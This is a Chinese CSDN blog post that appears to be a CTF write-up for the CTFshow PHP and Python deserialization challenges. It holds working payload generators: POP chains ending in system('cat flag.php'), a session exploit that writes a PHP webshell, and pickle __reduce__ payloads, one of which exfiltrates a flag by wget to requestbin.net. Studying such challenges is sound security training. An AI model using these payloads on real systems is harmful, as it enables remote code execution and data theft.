[CTFSHOW]反序列化(仅更新必要的题目)

最新推荐文章于 2024-08-20 00:33:12 发布
最新推荐文章于 2024-08-20 00:33:12 发布
阅读量4.7k 收藏 11
点赞数 9
分类专栏: 安全学习 # 训练打卡日记 # Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/110499314
版权
安全学习 同时被 3 个专栏收录
210 篇文章 86 订阅
订阅专栏
Web
94 篇文章 22 订阅
订阅专栏
训练打卡日记
66 篇文章 6 订阅
订阅专栏

文章目录

前言

新的篇章师傅们加油鸭,建议没有基础的师傅在web254完成后去百度一下ctf反序列化学习一下基础知识哦,这里不再赘述,然后有些题感觉比较简单可能不会更新了

web254

代码审计,首先初始化ctfShowUser类,在第二层if当中首先执行login方法,用于判断我们get传入的参数username和password是否与类中一致,发现用户名和密码都是xxxxxx,因此我们只需要传入username=xxxxxx&password=xxxxxx即可获取flag

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

web255

首先通过反序列化获取对象(序列化将对象保存到字符串,反序列化将字符串恢复为对象),之后checkVip要求是true,之后执行vipOneKeyGetFlag获取flag

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

因此我们配合php生成payload,配合burpsuite写入cookie字段并传入参数即可(注意在cookie字段当中需要url编码一波)(其名称以及存储的字符串值是必须经过URL编码的),之后get请求传入username=xxxxxx&password=xxxxxx

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
}

echo urlencode(serialize(new ctfShowUser()));

web256

和上一道题一样,就是要求username和password不能一样就可以啦

web257

解法一

代码审计,魔法函数
__construct当对象被创建的时候自动调用,对对象进行初始化。当所有的操作执行完毕之后,需要释放序列化的对象,触发__destruct()魔术方法

因此我们只需要在执行__construct的时候初始化backDoor类,方便我们进行命令执行的利用,之后反序列化结束后,会执行__destruct(),此时eval($this->code);等价于eval(system('cat flag.php');)

因此为了实现这个目的首先去掉我们不需要的info类,下面
构造pop链(由于配上private有特殊不可见字符不想手动处理所以进行url编码)

<?php
error_reporting(0);
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}
class backDoor{
    private $code="system('cat flag.php');";
    public function getInfo(){
        eval($code);
    }
}
echo urlencode(serialize(new ctfShowUser()));

最后生成反序列化构造的数据
同时username与password传入参数xxxxxx

O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D

解法二

知识点:php7.1+反序列化对类属性不敏感(其实和上面一样哒)
利用php特定版本下对private和public不敏感的特性构造

<?php
//error_reporting(0);
class ctfShowUser{
    public $class = 'backDoor';
}


class backDoor{
    public $code="system('cat flag.php');";
    public function getInfo(){
        eval($code);
    }
}

$a = new backDoor();
$b = new ctfShowUser();
$b->class=$a;
echo urlencode(serialize($b));

web258

绕过preg_match(’/[oc]:\d+:/i’, $var),使用➕

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
    public $class = 'backDoor';

    public function __construct(){
        $this->class=new backDoor();
    }

    public function __destruct(){
        $this->class->getInfo();
    }

}

class backDoor{
    public $code="system('cat flag.php');";
    public function getInfo(){
        eval($this->code);
    }
}
$a = new ctfShowUser();
$a = serialize($a);
$a= str_replace('O:', 'O:+',$a);//绕过preg_match
echo urlencode($a);

web259

写在了另一篇文章:
从一道题学习SoapClient与CRLF组合拳
https://y4tacker.blog.csdn.net/article/details/110521104

web262-264

暂时懒得更新

web263

考点:php-session反序列化,代码审计,文件泄露(www.zip)
感觉以前我写的挺详细的[代码审计]PHP中session的存储方式(WP)
利用点是session.serialize_handler与php.ini的配置不同引起的反序列化,至于为什么不同,如果相同的也就没必要加上这句设置了,毕竟是默认配置对吧
在这里插入图片描述
利用exp:()

<?php
class User{
    public $username="admin/../../../../../../../../../../var/www/html/1.php";
    public $password="<?php system('cat flag.php');?>";
    public $status;

}
$a = new User();
$c =  "|".serialize($a);
echo urlencode(base64_encode($c));

之后大致说下解题步骤:
1.首先访问首页,获得 cookie,同时建立 session
2.抓包修改 cookie 为序列化字符串
3.访问 check.php,反序列化实现 shell 写入
4.访问1.php审查元素查看flag

web265

用引用

<?php
class ctfshowAdmin{
    public $token=1;
    public $password=1;


    public function login(){
        return $this->token===$this->password;
    }
}
$a = new ctfshowAdmin();
$a->password=&$a->token;
echo urlencode(serialize($a));

web266

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

发现大小写不敏感不知道为啥,yq1ng师傅在评论区说的php对类的命名就不检查大小写,自己试了一下果然是的
在这里插入图片描述

web277

解法一

首先打开题目环境
在这里插入图片描述
审查元素发现关键的代码,发现是pickle反序列化
在这里插入图片描述
简单提一句,pickle可以序列化python的任何数据结构,包括一个类,一个对象,但如果像下面这样构造的类在序列化过程当中就会忽略a与b所以我们通常会将其写入__init__当中

class A(object):
    a = 'aaa'
    b = 2

接下来步入正轨,我们这里主要是用reduce进行利用,但是发现执行完以后没回显,只有一个成功的界面,害群主提示说dnslog带外输出,之后我尝试了curl、ping都不行最后发现wget可以,下面直接给出payload吧,有点累了想睡觉
在这里插入图片描述
这里配合了requestbin那个网站,当然也可以使用dnslog带外输出啦

#!/usr/bin/env python

import os
import pickle
import base64

class RunCmd(object):
    def __reduce__(self):
        return os.system, ('wget http://requestbin.net/r/rfs12yrf?a=`cat fla*`',)

print(base64.b64encode(pickle.dumps(RunCmd())))
# m=base64.b64decode(base64.b64encode(pickle.dumps(RunCmd())))
# m=pickle.loads(m)

拿到flag啦
在这里插入图片描述

解法二

rce盲注大家可以学习学习嘿嘿

#!/usr/bin/env python

import os
import pickle
import base64


class RunCmd(object):
    def __reduce__(self):
        return os.system, ('if [ `cut -c 1 ./flag` = 'f' ];then sleep 4;fi',)


print(base64.b64encode(pickle.dumps(RunCmd())))

参考链接

随笔分类 - PHP常识

Y4tacker
关注
专栏目录
CTFshow 反序列化 web263
Kradress的博客
12-20 1305
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
CTFshow 反序列化 web257
Kradress的博客
12-19 1892
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 3795
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
ctfshow web入门 web254——— 反序列化wp
最新发布
2202_75289892的博客
08-20 651
代码审计:定义了ctfShoeUser类get传参username和password,isset()是检查变量是否被定义的函数,若变量被定义且值不是null,那么返回值是true,接着实例化对象user.....最终输出flag所以我们传入的参数只要是已经被定义的值就行?
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6700
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
ctfshow 反序列化
..
03-07 3502
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
ctfshow反序列化 wp
yink12138的博客
01-04 2725
ctfshow反序列化wp
一道反序列化CTF题分享
seek_2022的博客
07-23 1176
一道有趣的CTF题目
ctfshow python反序列化 刷题记录
2301_82243979的博客
04-28 399
是一个字典,包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数,以便服务器可以根据这些参数来处理请求。先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码。,也可以在 http://ceye.io/payloads 中找相对应的 payload。的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6069
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow————反序列化
qq_45655564的博客
06-30 867
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
weekly-反序列化两道CTF练习题
网络安全学习
04-12 2717
文章目录EZ-unserializePOP 光说不练假把式,做点题,本次是某天的weekly-ctf的两道反序列化 EZ-unserialize 这是一个User类,定义了三个魔术方法,我们上一篇文章介绍了分别在什么时候调用,反序列化重建对象时会调用wakeup函数,在结束时会调用destruct class User{ function __construct($name,$pass){ $this->name = $name; $this->pass
PHP反序列化CTF例题
bwxzdjn的博客
03-25 5965
用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
CTF-反序列化
qq_61774705的博客
08-15 4521
反序列化
反序列化学习笔记【一文打通ctf中的反序列化题目
jayq1的博客
07-21 4937
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
反序列化】基础题_lemon
serendipity1130的博客
08-29 313
1.代码审计: evil类中有show_source函数,所以想要得到flag需要实例化一个lemon类让他去调用evil类中的action()函数。 2.为什么要实例化:因为只有实例化之后,才能将这个对象放到内存中,然后才能在规定的范围内来调用。这不包括静态对象,静态对象是可以直接调用的。 3.写poc链,首先申明lemon和evil两个类,然后将evil类赋值给classobj变量,让他执行evil类中的show_resource函数。Private和protected对象要进行url编码
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
2301_79655576的博客
04-07 335
简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。**[外链图片转存中…(img-rBXLGkXw-1712465674967)][外链图片转存中…(img-ZUCKXDQq-1712465674968)]
PHP反序列化入门题
ailx10
10-20 394
每一天都是新的一天,每一天都会接受新的信息,每一天都会有新的成长,昨天接到一个付费咨询,一直到晚上睡前才记起来,客户是一个大一学生,参加了大学的网络安全社团,然后遇到了一道题目,想求助我帮忙解决~这题考察的是PHP反序列化,还有对象的构造函数和析构函数,算是Web安全入门题,有兴趣和想法的小伙伴,可以在知乎平台购买Web安全三册,比京东便宜一点,本着助人为乐的精神,就帮助这位小兄弟分析一下~首先是...
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法在对象被销毁时会输出一个变量`$flag`的值。该类的序列化结果被输出并展示了如何利用`__destruct`方法来获取`$flag`的值。 引用中的代码展示了另一个类`ctfshowvip`,其中`password`属性被设置为包含恶意代码的字符串,利用`__destruct`方法中的弱比较漏洞,可以构造一个恶意的序列化payload来执行任意代码。 引用中的代码展示了一个修改后的类`ctfShowUser`,其中通过构造函数将`isVip`属性设置为`true`。通过构造一个链式调用,可以构造一个序列化的payload来实现`$this->isVip`值为`true`的反序列化攻击。 综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值